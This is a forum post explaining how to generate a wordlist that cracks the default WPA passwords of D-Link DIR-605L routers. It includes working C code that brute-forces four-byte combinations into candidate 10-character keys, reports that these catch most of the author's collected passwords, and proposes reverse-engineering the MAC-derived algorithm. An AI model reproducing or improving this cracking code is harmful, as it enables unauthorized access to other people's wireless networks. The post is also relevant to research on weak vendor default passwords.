Keyspace List for WPA on Default Routers

[drsnooker]

Hacked together some c-code. Catches 17 out of the 19 dir605l passwords I've collected. It generates a 50G dictionary in about 20 minutes. There are quite a few identical passwords in the rainbow table, so sort -u will help cut it in half.

It misses when the length of combined four bytes is less than what is need to fill the password.
e.g.  febii86601 --> 5418886601 cannot be split in 4 bytes , you'd need 5 bytes.
54 188 86 60 1
(although in this case you could flip left to right and get there, but then you'd miss on a different password in my collection)
Instead of the padding "000000" you'd need to do something a bit more clever to fill the remainder to get to 10 chars, some sort of recursive loop. I'm sure an actual programmer can figure that out!

Of course I'd rather have the real algorithm, but this can work until that is discovered. 
Working backwards from the password may work: password --> bytes --> ?math? <-- mac  
May be I'll give that a whirl tomorrow.

Code:

#include <stdio.h>

int main() {

    int byte1, byte2, byte3, byte4;
    char buffer[20];
    int pos;

    for (byte1 = 0; byte1 < 256; byte1++) {
        for (byte2 = 0; byte2 < 256; byte2++) {
            for (byte3 = 0; byte3 < 256; byte3++) {
                for (byte4 = 0; byte4 < 256; byte4++) {
                    sprintf(buffer, "%d%d%d%d%s", byte1, byte2, byte3, byte4,"000000"); // add padding
                          for (pos=0;pos<5;pos++)
                              buffer[pos]=buffer[pos]+49;
                         buffer[10]=0; // trim to first 10 chars
                         printf("%s\n",buffer);
}
}
}
}
}